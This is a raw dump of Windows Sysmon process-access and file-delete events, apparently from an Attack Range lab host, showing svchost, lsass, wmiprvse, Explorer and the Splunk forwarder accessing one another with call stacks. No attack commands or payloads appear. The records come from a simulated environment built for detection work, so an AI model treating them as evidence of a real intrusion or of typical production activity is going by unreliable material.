18:15:56.049{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.012{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.012{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.012{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:57.806{B81B27B7-4013-611D-1600-00000000C801}11965264C:\Windows\system32\svchost.exe{B81B27B7-4F5D-613A-6790-03000000C801}296C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:57.796{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4F5D-613A-6790-03000000C801}296C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:57.782{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F5D-613A-6790-03000000C801}296C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:57.782{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4F5D-613A-6790-03000000C801}296C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:57.229{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B97545E268CF3EFD9DBAEA13704A7A6D,SHA256=177EA4175A083A318BF28888085431E893ADD840344896032591FCFFE30E50D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:57.064{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA2B5E0AED301DFA983A27826BB20A92,SHA256=32BD146B7F2292677372C4C56FD19AD00E4D0014F6E2A3B45AE337505351B8B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:57.064{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99C8B50D9DA9394B7A4F70CE0E767E74,SHA256=7C5831E289642F0CE871166088C036AB10D757CDAD84D1554E7A118D2E0EA1C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.777{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA2B5E0AED301DFA983A27826BB20A92,SHA256=32BD146B7F2292677372C4C56FD19AD00E4D0014F6E2A3B45AE337505351B8B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.360{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CE4E73751FD8D1883877B284CB67C9A4,SHA256=C5DC89BFA446CDC06034FF1076A0C8F8C8851A3B06B86C9284096EF00BF378ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.298{B81B27B7-4133-611D-AB00-00000000C801}45644696C:\Windows\Explorer.EXE{B81B27B7-98CE-6127-BF45-01000000C801}5176C:\Windows\system32\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7c948|C:\Windows\System32\TwinUI.dll+75f2d|C:\Windows\System32\TwinUI.dll+75b03|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.298{B81B27B7-4133-611D-AB00-00000000C801}45644768C:\Windows\Explorer.EXE{B81B27B7-98CE-6127-BF45-01000000C801}5176C:\Windows\system32\notepad.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15d19|C:\Windows\System32\SHELL32.dll+b1b50|C:\Windows\System32\SHELL32.dll+b3057|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.298{B81B27B7-4133-611D-AB00-00000000C801}45644768C:\Windows\Explorer.EXE{B81B27B7-98CE-6127-BF45-01000000C801}5176C:\Windows\system32\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b1604|C:\Windows\System32\SHELL32.dll+b3057|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.282{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-98CE-6127-BF45-01000000C801}5176C:\Windows\system32\notepad.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15d19|C:\Windows\System32\SHELL32.dll+b1b50|C:\Windows\System32\SHELL32.dll+b2a80|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.282{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-98CE-6127-BF45-01000000C801}5176C:\Windows\system32\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b1604|C:\Windows\System32\SHELL32.dll+b2a80|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.282{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-98CE-6127-BF45-01000000C801}5176C:\Windows\system32\notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E10388FC91C9CEC361BA2AAC0E087568,SHA256=B93321646AE7F99B264D6EE95617E00ACE5FDFCE07CFACD49593A0B064AA29BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 